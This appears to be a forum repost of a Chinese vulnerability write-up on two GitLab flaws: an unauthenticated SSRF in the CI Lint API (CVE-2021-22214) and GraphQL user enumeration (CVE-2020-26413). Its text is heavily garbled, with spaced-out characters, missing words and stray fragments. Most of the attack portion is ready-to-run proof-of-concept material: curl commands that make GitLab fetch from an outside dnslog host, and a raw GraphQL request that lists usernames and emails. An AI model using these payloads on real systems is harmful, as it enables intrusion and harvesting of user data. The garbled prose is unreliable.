搜索

[27278] 2021-06-22_追洞计划GitlabCILintAPI未授权SSRF漏洞(CVE-2021-22214)

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-19
2021-06-22_追洞计划GitlabCILintAPI未授权SSRF漏洞(CVE-2021-22214)   |   G i t l a b   C I   L i n t   A P I   S S R F ( C V E - 2 0 2 1 - 2 2 2 1 4 )     M s 0 8 0 6 7   2 0 2 1 - 0 6 - 2 2   #   , 2 3 M S 0 8 0 6 7   W e b T a o i n g W e b   G i t L a b   使 G i t W e b   G i t L a b G i t L a b 使 R u b y   o n   R a i l s G i t B u g   C V E - 2 0 2 1 - 2 2 2 1 4   G i t L a b S S R F S S R F C V E - 2 0 2 1 - 2 2 2 1 4   H T T P   访     a p p = " G i t L a b "     1 0 . 5       1 3 . 1 2 . 2 ,   1 3 . 1 1 . 5     1 3 . 1 0 . 5 P O C c u r l   - s   - - s h o w - e r r o r   - H   ' C o n t e n t - T y p e :   a p p l i c a t i o n / j s o n '   h t t p s : / / e x a m p l e . g i t l a b . c o m / a p i / v 4 / c i / l i n t   - - d a t a   ' {   " i n c l u d e _ m e r g e d _ y a m l " :   t r u e ,   " c o n t e n t " :   " i n c l u d e : n     r e m o t e :   h t t p : / / x x . x x x . x x . x x : p o r t / a p i / v 1 / t a r g e t s ? t e s t . y m l " } '
1 C e n t O S 7 . 6   1 ) y u m g i t l a b - c e c u r l   - s   h t t p s : / / p a c k a g e s . g i t l a b . c o m / i n s t a l l / r e p o s i t o r i e s / g i t l a b / g i t l a b - c e / s c r i p t . r p m . s h   |   s u d o   b a s h   2 ) y u m s u d o   y u m   m a k e c a c h e   3 ) g i t l a b y u m   l i s t   g i t l a b - c e   - - s h o w d u p l i c a t e s | s o r t   - r   使 使 y u m 1 3 . 1 2 . 1 y u m   i n s t a l l   g i t l a b - c e - 1 3 . 1 2 . 1 - c e . 0 . e l 7   使 g i t l a b g i t l a b - c t l   r e c o n f i g u r e
  g i t l a b 8 0 g i t l a b - c t l   r e c o n f i g u r e 2   1 ) d n s l o g c u r l   - s   - - s h o w - e r r o r   - H   ' C o n t e n t - T y p e :   a p p l i c a t i o n / j s o n '   h t t p : / / 4 7 . 2 4 3 . 3 7 . 7 1 / a p i / v 4 / c i / l i n t   - - d a t a   ' {   " i n c l u d e _ m e r g e d _ y a m l " :   t r u e ,   " c o n t e n t " :   " i n c l u d e : n     r e m o t e :   h t t p : / / r k v 4 o v . d n s l o g . c n / a p i / v 1 / t a r g e t s / ? t e s t . y m l " } '
G i t L a b _ G r a p h q l ( C V E - 2 0 2 0 - 2 6 4 1 3 )   G i t L a b G i t L a b 使 R u b y   o n   R a i l s G i t B u g   G i t L a b G r a p h q l     G i t L a b   1 3 . 4     1 3 . 6 . 2   t i t l e = " G i t L a b "   访   U R L h t t p : / / x x x . x x x . x x x . x x x / - / / g r a p h q l - e x p l o r e r
  G i t l a b   G r a p h q l   G r a p h q l   / a p i / g r a p h q l   : P O S T   / / a p i / g r a p h q l   H T T P / 1 . 1 H o s t :   1 0 . 1 . 2 . 3 3 : 8 8 8 8 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 8 6 . 0 . 4 2 4 0 . 1 1 1   S a f a r i / 5 3 7 . 3 6 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t :   * / * C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   a p p l i c a t i o n / j s o n C o n t e n t - L e n g t h :   2 2 0 { " q u e r y " : " { n u s e r s   { n e d g e s   { n   n o d e   { n   u s e r n a m e n   e m a i l n   a v a t a r U r l n   s t a t u s   { n   e m o j i n   m e s s a g e n   m e s s a g e H t m l n   } n   } n   } n   } n   } " , " v a r i a b l e s " : n u l l , " o p e r a t i o n N a m e " : n u l l }
6 1 8 6 6 . 1 8   1 6 9 9 2 4 5 8 1 0 3 W e b 8 9 9 9 P y t h o n 9 9 K a l i   L i n u x 2   ( 2 ) 8 9 J a v a                       1 1 8          
  5 0 9 0 6 . 2 0 3 0 W e b 3 6 5 6 1 8 2 9 9        

A p p 4 0 0 0     4 0 0 0 +

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理